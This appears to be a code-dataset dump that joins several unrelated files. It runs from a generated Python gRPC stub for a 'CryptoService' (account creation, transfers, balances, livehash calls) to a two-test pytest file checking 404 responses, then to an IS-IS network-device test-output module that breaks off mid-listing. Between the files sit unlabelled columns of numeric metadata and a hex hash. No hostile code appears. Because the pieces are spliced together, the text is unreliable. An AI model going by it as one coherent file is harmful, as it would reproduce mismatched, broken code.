import transaction_response_pb2 as transaction__response__pb2
class CryptoServiceStub(object):
"""*
Transactions and queries for the Crypto Service
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.createAccount = channel.unary_unary(
'/proto.CryptoService/createAccount',
request_serializer=transaction__pb2.Transaction.SerializeToString,
response_deserializer=transaction__response__pb2.TransactionResponse.FromString,
)
self.updateAccount = channel.unary_unary(
'/proto.CryptoService/updateAccount',
request_serializer=transaction__pb2.Transaction.SerializeToString,
response_deserializer=transaction__response__pb2.TransactionResponse.FromString,
)
self.cryptoTransfer = channel.unary_unary(
'/proto.CryptoService/cryptoTransfer',
request_serializer=transaction__pb2.Transaction.SerializeToString,
response_deserializer=transaction__response__pb2.TransactionResponse.FromString,
)
self.cryptoDelete = channel.unary_unary(
'/proto.CryptoService/cryptoDelete',
request_serializer=transaction__pb2.Transaction.SerializeToString,
response_deserializer=transaction__response__pb2.TransactionResponse.FromString,
)
self.addLiveHash = channel.unary_unary(
'/proto.CryptoService/addLiveHash',
request_serializer=transaction__pb2.Transaction.SerializeToString,
response_deserializer=transaction__response__pb2.TransactionResponse.FromString,
)
self.deleteLiveHash = channel.unary_unary(
'/proto.CryptoService/deleteLiveHash',
request_serializer=transaction__pb2.Transaction.SerializeToString,
response_deserializer=transaction__response__pb2.TransactionResponse.FromString,
)
self.getLiveHash = channel.unary_unary(
'/proto.CryptoService/getLiveHash',
request_serializer=query__pb2.Query.SerializeToString,
response_deserializer=response__pb2.Response.FromString,
)
self.getAccountRecords = channel.unary_unary(
'/proto.CryptoService/getAccountRecords',
request_serializer=query__pb2.Query.SerializeToString,
response_deserializer=response__pb2.Response.FromString,
)
self.cryptoGetBalance = channel.unary_unary(
'/proto.CryptoService/cryptoGetBalance',
request_serializer=query__pb2.Query.SerializeToString,
response_deserializer=response__pb2.Response.FromString,
)
self.getAccountInfo = channel.unary_unary(
'/proto.CryptoService/getAccountInfo',
request_serializer=query__pb2.Query.SerializeToString,
response_deserializer=response__pb2.Response.FromString,
)
self.getTransactionReceipts = channel.unary_unary(
'/proto.CryptoService/getTransactionReceipts',
request_serializer=query__pb2.Query.SerializeToString,
response_deserializer=response__pb2.Response.FromString,
)
self.getFastTransactionRecord = channel.unary_unary(
'/proto.CryptoService/getFastTransactionRecord',
request_serializer=query__pb2.Query.SerializeToString,
response_deserializer=response__pb2.Response.FromString,
)
self.getTxRecordByTxID = channel.unary_unary(
'/proto.CryptoService/getTxRecordByTxID',
request_serializer=query__pb2.Query.SerializeToString,
response_deserializer=response__pb2.Response.FromString,
)
self.getStakersByAccountID = channel.unary_unary(
'/proto.CryptoService/getStakersByAccountID',
request_serializer=query__pb2.Query.SerializeToString,
response_deserializer=response__pb2.Response.FromString,
)
class CryptoServiceServicer(object):
"""*
Transactions and queries for the Crypto Service
"""
def createAccount(self, request, context):
"""*
Creates a new account by submitting the transaction
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def updateAccount(self, request, context):
"""*
Updates an account by submitting the transaction
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def cryptoTransfer(self, request, context):
"""*
Initiates a transfer by submitting the transaction
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def cryptoDelete(self, request, context):
"""*
Deletes and account by submitting the transaction
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def addLiveHash(self, request, context):
"""*
(NOT CURRENTLY SUPPORTED) Adds a livehash
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def deleteLiveHash(self, request, context):
"""*
(NOT CURRENTLY SUPPORTED) Deletes a livehash
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def getLiveHash(self, request, context):
"""*
(NOT CURRENTLY SUPPORTED) Retrieves a livehash for an account
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def getAccountRecords(self, request, context):
"""*
Returns all transactions in the last 180s of consensus time for which the given account was
the effective payer <b>and</b> network property <tt>ledger.keepRecordsInState</tt> was
<tt>true</tt>.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def cryptoGetBalance(self, request, context):
"""*
Retrieves the balance of an account
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def getAccountInfo(self, request, context):
"""*
Retrieves the metadata of an account
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def getTransactionReceipts(self, request, context):
"""*
Retrieves the latest receipt for a transaction that is either awaiting consensus, or reached
consensus in the last 180 seconds
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def getFastTransactionRecord(self, request, context):
"""*
(NOT CURRENTLY SUPPORTED) Returns the records of transactions recently funded by an account
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def getTxRecordByTxID(self, request, context):
"""*
Retrieves the record of a transaction that is either awaiting consensus, or reached consensus
in the last 180 seconds
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def getStakersByAccountID(self, request, context):
"""*
(NOT CURRENTLY SUPPORTED) Retrieves the stakers for a node by account id
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_CryptoServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'createAccount': grpc.unary_unary_rpc_method_handler(
servicer.createAccount,
request_deserializer=transaction__pb2.Transaction.FromString,
response_serializer=transaction__response__pb2.TransactionResponse.SerializeToString,
),
'updateAccount': grpc.unary_unary_rpc_method_handler(
servicer.updateAccount,
request_deserializer=transaction__pb2.Transaction.FromString,
response_serializer=transaction__response__pb2.TransactionResponse.SerializeToString,
),
'cryptoTransfer': grpc.unary_unary_rpc_method_handler(
servicer.cryptoTransfer,
request_deserializer=transaction__pb2.Transaction.FromString,
response_serializer=transaction__response__pb2.TransactionResponse.SerializeToString,
),
'cryptoDelete': grpc.unary_unary_rpc_method_handler(
servicer.cryptoDelete,
request_deserializer=transaction__pb2.Transaction.FromString,
response_serializer=transaction__response__pb2.TransactionResponse.SerializeToString,
),
'addLiveHash': grpc.unary_unary_rpc_method_handler(
servicer.addLiveHash,
request_deserializer=transaction__pb2.Transaction.FromString,
response_serializer=transaction__response__pb2.TransactionResponse.SerializeToString,
),
'deleteLiveHash': grpc.unary_unary_rpc_method_handler(
servicer.deleteLiveHash,
request_deserializer=transaction__pb2.Transaction.FromString,
response_serializer=transaction__response__pb2.TransactionResponse.SerializeToString,
),
'getLiveHash': grpc.unary_unary_rpc_method_handler(
servicer.getLiveHash,
request_deserializer=query__pb2.Query.FromString,
response_serializer=response__pb2.Response.SerializeToString,
),
'getAccountRecords': grpc.unary_unary_rpc_method_handler(
servicer.getAccountRecords,
request_deserializer=query__pb2.Query.FromString,
response_serializer=response__pb2.Response.SerializeToString,
),
'cryptoGetBalance': grpc.unary_unary_rpc_method_handler(
servicer.cryptoGetBalance,
request_deserializer=query__pb2.Query.FromString,
response_serializer=response__pb2.Response.SerializeToString,
),
'getAccountInfo': grpc.unary_unary_rpc_method_handler(
servicer.getAccountInfo,
request_deserializer=query__pb2.Query.FromString,
response_serializer=response__pb2.Response.SerializeToString,
),
'getTransactionReceipts': grpc.unary_unary_rpc_method_handler(
servicer.getTransactionReceipts,
request_deserializer=query__pb2.Query.FromString,
response_serializer=response__pb2.Response.SerializeToString,
),
'getFastTransactionRecord': grpc.unary_unary_rpc_method_handler(
servicer.getFastTransactionRecord,
request_deserializer=query__pb2.Query.FromString,
response_serializer=response__pb2.Response.SerializeToString,
),
'getTxRecordByTxID': grpc.unary_unary_rpc_method_handler(
servicer.getTxRecordByTxID,
request_deserializer=query__pb2.Query.FromString,
response_serializer=response__pb2.Response.SerializeToString,
),
'getStakersByAccountID': grpc.unary_unary_rpc_method_handler(
servicer.getStakersByAccountID,
request_deserializer=query__pb2.Query.FromString,
response_serializer=response__pb2.Response.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'proto.CryptoService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class CryptoService(object):
"""*
Transactions and queries for the Crypto Service
"""
@staticmethod
def createAccount(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/createAccount',
transaction__pb2.Transaction.SerializeToString,
transaction__response__pb2.TransactionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def updateAccount(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/updateAccount',
transaction__pb2.Transaction.SerializeToString,
transaction__response__pb2.TransactionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def cryptoTransfer(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/cryptoTransfer',
transaction__pb2.Transaction.SerializeToString,
transaction__response__pb2.TransactionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def cryptoDelete(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/cryptoDelete',
transaction__pb2.Transaction.SerializeToString,
transaction__response__pb2.TransactionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def addLiveHash(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/addLiveHash',
transaction__pb2.Transaction.SerializeToString,
transaction__response__pb2.TransactionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def deleteLiveHash(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/deleteLiveHash',
transaction__pb2.Transaction.SerializeToString,
transaction__response__pb2.TransactionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def getLiveHash(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/getLiveHash',
query__pb2.Query.SerializeToString,
response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def getAccountRecords(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/getAccountRecords',
query__pb2.Query.SerializeToString,
response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def cryptoGetBalance(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/cryptoGetBalance',
query__pb2.Query.SerializeToString,
response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def getAccountInfo(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/getAccountInfo',
query__pb2.Query.SerializeToString,
response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def getTransactionReceipts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/getTransactionReceipts',
query__pb2.Query.SerializeToString,
response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def getFastTransactionRecord(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/getFastTransactionRecord',
query__pb2.Query.SerializeToString,
response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def getTxRecordByTxID(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/getTxRecordByTxID',
query__pb2.Query.SerializeToString,
response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def getStakersByAccountID(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/getStakersByAccountID',
query__pb2.Query.SerializeToString,
response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 43.031657
| 110
| 0.646573
| 1,939
| 23,108
| 7.43837
| 0.077875
| 0.035083
| 0.038827
| 0.051168
| 0.82105
| 0.778756
| 0.770644
| 0.727103
| 0.723844
| 0.71691
| 0
| 0.006078
| 0.280898
| 23,108
| 536
| 111
| 43.11194
| 0.861888
| 0.062143
| 0
| 0.708046
| 1
| 0
| 0.089776
| 0.051428
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.011494
| 0.032184
| 0.11954
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a584d36985ab6520c9b09fa1242333766ea0bf15
| 238
|
py
|
Python
|
tests/test_api_general.py
|
Toxe/python-flask-rest-jwt
|
aed68897e7a5674322458e4328f3a0f2ebf22f67
|
[
"MIT"
] | null | null | null |
tests/test_api_general.py
|
Toxe/python-flask-rest-jwt
|
aed68897e7a5674322458e4328f3a0f2ebf22f67
|
[
"MIT"
] | null | null | null |
tests/test_api_general.py
|
Toxe/python-flask-rest-jwt
|
aed68897e7a5674322458e4328f3a0f2ebf22f67
|
[
"MIT"
] | null | null | null |
def test_api_slash_request_forbidden(client):
assert client.get("/").status_code == 404
def test_api_root_request_forbidden(client):
assert client.get("/api").status_code == 404
assert client.get("/api/").status_code == 404
| 29.75
| 49
| 0.731092
| 34
| 238
| 4.794118
| 0.382353
| 0.220859
| 0.276074
| 0.343558
| 0.742331
| 0.742331
| 0.380368
| 0
| 0
| 0
| 0
| 0.043269
| 0.12605
| 238
| 7
| 50
| 34
| 0.740385
| 0
| 0
| 0
| 0
| 0
| 0.042017
| 0
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0.4
| false
| 0
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3c1d5873510594e3eeb97509c23376d4b923a859
| 142,840
|
py
|
Python
|
pkgs/ops-pkg/src/genie/libs/ops/isis/nxos/tests/isis_output.py
|
jbronikowski/genielibs
|
200a34e5fe4838a27b5a80d5973651b2e34ccafb
|
[
"Apache-2.0"
] | 94
|
2018-04-30T20:29:15.000Z
|
2022-03-29T13:40:31.000Z
|
pkgs/ops-pkg/src/genie/libs/ops/isis/nxos/tests/isis_output.py
|
jbronikowski/genielibs
|
200a34e5fe4838a27b5a80d5973651b2e34ccafb
|
[
"Apache-2.0"
] | 67
|
2018-12-06T21:08:09.000Z
|
2022-03-29T18:00:46.000Z
|
pkgs/ops-pkg/src/genie/libs/ops/isis/nxos/tests/isis_output.py
|
jbronikowski/genielibs
|
200a34e5fe4838a27b5a80d5973651b2e34ccafb
|
[
"Apache-2.0"
] | 49
|
2018-06-29T18:59:03.000Z
|
2022-03-10T02:07:59.000Z
|
"""
Isis Genie Ops Object Outputs for IOSXE.
"""
class IsisOutput(object):
showIsisVrfAll = '''\
show isis vrf all
ISIS process : test
Instance number : 1
UUID: 1090519320
Process ID 1326
VRF: default
System ID : 7777.7777.7777 IS-Type : L1-L2
SAP : 412 Queue Handle : 15
Maximum LSP MTU: 1492
Stateful HA enabled
Graceful Restart enabled. State: Inactive
Last graceful restart status : none
Start-Mode Complete
BFD IPv4 is globally disabled for ISIS process: test
BFD IPv6 is globally disabled for ISIS process: test
Topology-mode is Multitopology
Metric-style : advertise(wide), accept(narrow, wide)
Area address(es) :
49.0002
Process is up and running
VRF ID: 1
Stale routes during non-graceful controlled restart
Enable resolution of L3->L2 address for ISIS adjacency
SR IPv4 is not configured and disabled for ISIS process: test
SR IPv6 is not configured and disabled for ISIS process: test
Interfaces supported by IS-IS :
loopback0
Ethernet1/1
Ethernet1/2
Ethernet1/3
Ethernet1/4
Topology : 0
Address family IPv4 unicast :
Number of interface : 5
Distance : 115
Address family IPv6 unicast :
Number of interface : 0
Distance : 115
Topology : 2
Address family IPv6 unicast :
Number of interface : 5
Distance : 115
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
L1 Next SPF: 00:00:06
L2 Next SPF: 00:00:02
ISIS process : test
Instance number : 1
UUID: 1090519320
Process ID 1326
VRF: VRF1
System ID : 7777.7777.7777 IS-Type : L1-L2
SAP : 412 Queue Handle : 15
Maximum LSP MTU: 1492
Stateful HA enabled
Graceful Restart enabled. State: Inactive
Last graceful restart status : none
Start-Mode Complete
BFD IPv4 is globally disabled for ISIS process: test
BFD IPv6 is globally disabled for ISIS process: test
Topology-mode is Multitopology
Metric-style : advertise(wide), accept(narrow, wide)
Area address(es) :
49.0002
Process is up and running
VRF ID: 3
Stale routes during non-graceful controlled restart
Enable resolution of L3->L2 address for ISIS adjacency
SR IPv4 is not configured and disabled for ISIS process: test
SR IPv6 is not configured and disabled for ISIS process: test
Interfaces supported by IS-IS :
loopback1
Ethernet1/5
Topology : 0
Address family IPv4 unicast :
Number of interface : 2
Distance : 115
Address family IPv6 unicast :
Number of interface : 0
Distance : 115
Topology : 2
Address family IPv6 unicast :
Number of interface : 2
Distance : 115
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
L1 Next SPF: Inactive
L2 Next SPF: 00:00:05
'''
showIsisInterfaceVrfAll = '''\
show isis interface vrf all
IS-IS process: test VRF: default
loopback0, Interface status: protocol-up/link-up/admin-up
IP address: 7.7.7.7, IP subnet: 7.7.7.7/32
IPv6 address:
2001:db8:7:7:7::7/128 [VALID]
IPv6 subnet: 2001:db8:7:7:7::7/128
IPv6 link-local address: fe80::5c00:40ff:fe06:0
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0001, Local Circuit ID: 0x01, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface loopback0
BFD IPv6 is locally disabled for Interface loopback0
MTR is enabled
Level Metric
1 1
2 1
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 1 no UP UP yes DN yes
1 2 1 no UP DN no UP yes
2 0 1 no UP UP yes DN yes
2 2 1 no UP DN no UP yes
Ethernet1/1, Interface status: protocol-up/link-up/admin-up
IP address: 10.5.7.7, IP subnet: 10.5.7.0/24
IPv6 address:
2001:db8:10:5:7::7/64 [VALID]
IPv6 subnet: 2001:db8:10:5::/64
IPv6 link-local address: fe80::5c00:40ff:fe06:7
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0002, Local Circuit ID: 0x01, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface Ethernet1/1
BFD IPv6 is locally disabled for Interface Ethernet1/1
MTR is enabled
Passive level: level-1-2
LSP interval: 33 ms, MTU: 1500
Level-1 Designated IS: R5
Level-2 Designated IS: R5
Level Metric-0 Metric-2 CSNP Next CSNP Hello Multi Next IIH
1 40 40 10 00:00:02 10 3 00:00:05
2 40 40 10 00:00:08 10 3 00:00:05
Level Adjs AdjsUp Pri Circuit ID Since
1 1 1 64 R5.03 1w0d
2 1 1 64 R5.03 1w0d
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 40 no UP UP yes DN yes
1 2 40 no UP DN no UP yes
2 0 40 no UP UP yes DN yes
2 2 40 no UP DN no UP yes
Ethernet1/2, Interface status: protocol-up/link-up/admin-up
IP address: 10.6.7.7, IP subnet: 10.6.7.0/24
IPv6 address:
2001:db8:10:6:7::7/64 [VALID]
IPv6 subnet: 2001:db8:10:6::/64
IPv6 link-local address: fe80::5c00:40ff:fe06:7
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0003, Local Circuit ID: 0x02, Circuit Type: L1
BFD IPv4 is locally disabled for Interface Ethernet1/2
BFD IPv6 is locally disabled for Interface Ethernet1/2
MTR is enabled
LSP interval: 33 ms, MTU: 1500
Level-1 Designated IS: R7
Level Metric-0 Metric-2 CSNP Next CSNP Hello Multi Next IIH
1 40 40 10 0.788413 3 3 0.589815
2 40 40 10 Inactive 10 3 Inactive
Level Adjs AdjsUp Pri Circuit ID Since
1 1 1 64 R7.02 * 1w0d
2 0 0 64 0000.0000.0000.00 never
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 40 no UP UP yes DN yes
1 2 40 no UP DN no UP yes
2 0 40 no UP DN no DN no
2 2 40 no UP DN no DN no
Ethernet1/3, Interface status: protocol-up/link-up/admin-up
IP address: 10.7.8.7, IP subnet: 10.7.8.0/24
IPv6 address:
2001:db8:10:7:8::7/64 [VALID]
IPv6 subnet: 2001:db8:10:7::/64
IPv6 link-local address: fe80::5c00:40ff:fe06:7
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0004, Local Circuit ID: 0x03, Circuit Type: L2
BFD IPv4 is locally disabled for Interface Ethernet1/3
BFD IPv6 is locally disabled for Interface Ethernet1/3
MTR is enabled
LSP interval: 33 ms, MTU: 1500
Level-2 Designated IS: R8
Level Metric-0 Metric-2 CSNP Next CSNP Hello Multi Next IIH
1 40 40 10 Inactive 10 3 Inactive
2 40 40 10 00:00:05 10 3 00:00:04
Level Adjs AdjsUp Pri Circuit ID Since
1 0 0 64 0000.0000.0000.00 never
2 1 1 64 R8.01 1w0d
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 40 no UP DN no DN no
1 2 40 no UP DN no DN no
2 0 40 no UP UP yes DN yes
2 2 40 no UP DN no UP yes
Ethernet1/4, Interface status: protocol-up/link-up/admin-up
IP address: 10.7.9.7, IP subnet: 10.7.9.0/24
IPv6 address:
2001:db8:10:77:9::7/64 [VALID]
IPv6 subnet: 2001:db8:10:77::/64
IPv6 link-local address: fe80::5c00:40ff:fe06:7
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0005, Local Circuit ID: 0x04, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface Ethernet1/4
BFD IPv6 is locally disabled for Interface Ethernet1/4
MTR is enabled
LSP interval: 33 ms, MTU: 1500
Level-2 Designated IS: R9
Level Metric-0 Metric-2 CSNP Next CSNP Hello Multi Next IIH
1 40 40 10 Inactive 10 3 00:00:04
2 40 40 10 00:00:03 10 3 0.911618
Level Adjs AdjsUp Pri Circuit ID Since
1 0 0 64 R7.04 never
2 1 1 64 R9.01 1w0d
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 40 no UP UP yes DN yes
1 2 40 no UP DN no UP yes
2 0 40 no UP UP yes DN yes
2 2 40 no UP DN no UP yes
IS-IS process: test VRF: VRF1
loopback1, Interface status: protocol-up/link-up/admin-up
IP address: 77.77.77.77, IP subnet: 77.77.77.77/32
IPv6 address:
2001:db8:77:77:77::77/128 [VALID]
IPv6 subnet: 2001:db8:77:77:77::77/128
IPv6 link-local address: fe80::5c00:40ff:fe06:0
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0002, Local Circuit ID: 0x01, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface loopback1
BFD IPv6 is locally disabled for Interface loopback1
MTR is enabled
Level Metric
1 1
2 1
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 1 no UP UP yes DN yes
1 2 1 no UP DN no UP yes
2 0 1 no UP UP yes DN yes
2 2 1 no UP DN no UP yes
Ethernet1/5, Interface status: protocol-up/link-up/admin-up
IP address: 20.2.7.7, IP subnet: 20.2.7.0/24
IPv6 address:
2001:db8:20:2:7::7/64 [VALID]
IPv6 subnet: 2001:db8:20:2::/64
IPv6 link-local address: fe80::5c00:40ff:fe06:7
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0001, Local Circuit ID: 0x01, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface Ethernet1/5
BFD IPv6 is locally disabled for Interface Ethernet1/5
MTR is enabled
LSP interval: 33 ms, MTU: 1500
Level-2 Designated IS: R2
Level Metric-0 Metric-2 CSNP Next CSNP Hello Multi Next IIH
1 40 40 10 Inactive 10 3 00:00:02
2 40 40 10 00:00:04 10 3 00:00:08
Level Adjs AdjsUp Pri Circuit ID Since
1 0 0 64 R7.01 never
2 1 1 64 R2.01 1w0d
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 40 no UP UP yes DN yes
1 2 40 no UP DN no UP yes
2 0 40 no UP UP yes DN yes
2 2 40 no UP DN no UP yes
'''
showIsisAdjacencyVrfAll = '''\
show isis adjacency vrf all
IS-IS process: test VRF: default
IS-IS adjacency database:
Legend: '!': No AF level connectivity in given topology
System ID SNPA Level State Hold Time Interface
R5 fa16.3ed0.46fc 1 UP 00:00:08 Ethernet1/1
R5 fa16.3ed0.46fc 2 UP 00:00:09 Ethernet1/1
R6 5e00.4005.0007 1 UP 00:00:30 Ethernet1/2
R8 fa16.3eed.aa40 2 UP 00:00:08 Ethernet1/3
R9 fa16.3e06.ce8d 2 UP 00:00:09 Ethernet1/4
IS-IS process: test VRF: VRF1
IS-IS adjacency database:
Legend: '!': No AF level connectivity in given topology
System ID SNPA Level State Hold Time Interface
R2 fa16.3e63.eab0 2 UP 00:00:09 Ethernet1/5
'''
showIsisHostnameDetailVrfAll = '''\
show isis hostname detail vrf all
IS-IS Process: test dynamic hostname table VRF: default
Level LSP ID Dynamic hostname
2 2222.2222.2222.00-00 R2
1 3333.3333.3333.00-00 R3
2 3333.3333.3333.00-00 R3
1 4444.4444.4444.00-00 R4
1 5555.5555.5555.00-00 R5
2 5555.5555.5555.00-00 R5
1 6666.6666.6666.00-00 R6
1 7777.7777.7777.00-00* R7
2 7777.7777.7777.00-00* R7
2 8888.8888.8888.00-00 R8
2 9999.9999.9999.00-00 R9
IS-IS Process: test dynamic hostname table VRF: VRF1
Level LSP ID Dynamic hostname
2 2222.2222.2222.00-00 R2
1 7777.7777.7777.00-00* R7
2 7777.7777.7777.00-00* R7
'''
showIsisDatabaseDetail = '''\
show isis database detail
IS-IS Process: test LSP database VRF: default
IS-IS Level-1 Link State Database
LSPID Seq Number Checksum Lifetime A/P/O/T
R3.00-00 0x00000354 0xD12B 712 1/0/0/3
Instance : 0x0000034F
Area Address : 49.0002
Extended IS : R3.01 Metric : 10
Extended IS : R4.03 Metric : 10
Extended IS : R3.05 Metric : 10
NLPID : 0xCC 0x8E
IP Address : 3.3.3.3
Extended IP : 3.3.3.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
